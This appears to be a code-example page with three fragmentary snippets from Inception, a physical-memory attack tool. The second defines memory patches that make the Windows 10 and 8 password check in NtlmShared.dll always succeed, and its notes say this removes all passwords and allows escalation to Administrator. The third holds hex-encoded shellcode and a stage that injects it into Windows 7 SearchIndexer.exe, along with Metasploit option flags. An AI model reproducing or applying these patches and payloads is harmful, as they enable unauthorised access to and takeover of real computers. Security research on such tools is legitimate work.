Esempio n. 1
0
from inception import memory
from inception.interfaces import file as interface
from inception.memory import Target, Signature, Chunk

# Target template
targets = [
    Target(name='find',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
                         md5=None,
                         tag=False,
                         offsets=[0x2a0],
                         chunks=[
                             Chunk(chunk=0x9782440e1b5939ff,
                                   chunkoffset=0x00,
                                   patch=0x00,
                                   patchoffset=0x00)
                         ])
           ]),
    Target(name='findall',
           note=None,
           signatures=[
               Signature(os=None,
                         os_versions=[],
                         os_architectures=['x86', 'x64'],
                         executable=None,
                         version=None,
Esempio n. 2
0
targets = [
    Target(
        name='Windows 10 MsvpPasswordValidate unlock/privilege escalation',
        note='Ensures that the password-check always returns true. This will '
        'cause all accounts to no longer require a password, and will '
        'also allow you to escalate privileges to Administrator via the '
        '\'runas\' command.',
        signatures=[
            Signature(os='Windows 10',
                      os_versions=['10.0'],
                      os_architectures=['x64'],
                      executable='NtlmShared.dll',
                      version=None,
                      md5=None,
                      tag=False,
                      offsets=[0x14f],
                      chunks=[
                          Chunk(chunk=0xc60f84,
                                chunkoffset=0x00,
                                patch=0xb001,
                                patchoffset=0x07)
                      ])
        ]),
    Target(
        name='Windows 8 MsvpPasswordValidate unlock/privilege escalation',
        note='Ensures that the password-check always returns true. This will '
        'cause all accounts to no longer require a password, and will '
        'also allow you to escalate privileges to Administrator via the '
        '\'runas\' command.',
        signatures=[
            Signature(os='Windows 8',
Esempio n. 3
0
    b'\x5c\x53\x65\x61\x72\x63\x68\x49\x6e\x64\x65\x78\x65\x72' +
    b'\x2e\x65\x78\x65\x7c\x53\x76\x63\x3d\x57\x53\x65\x61\x72' +
    b'\x63\x68\x7c\x4e\x61\x6d\x65\x3d\x53\x65\x61\x72\x63\x68' +
    b'\x49\x6e\x64\x65\x78\x65\x72\x2d\x32\x7c\x22\x22\x00'
}

stage1 = Target(name='Allocate page',
                note='Create page, copy signature to it and jump to page',
                signatures=[
                    Signature(offsets=[0x18c],
                              chunks=[
                                  Chunk(chunk=0x8bff558bec813D,
                                        chunkoffset=0,
                                        patch=shellcode['alloc_page'],
                                        patchoffset=0)
                              ],
                              os='Windows 7',
                              os_versions=['SP1'],
                              os_architectures=['x86'],
                              executable='SearchIndexer.exe',
                              version='',
                              md5='',
                              tag=False)
                ])


def add_options(group):
    group.add_option('--msfopts',
                     dest='msfopts',
                     help='exploit options in a comma-separated list using '
                     'the format \'OPTION=value\'')
    group.add_option('--msfpw',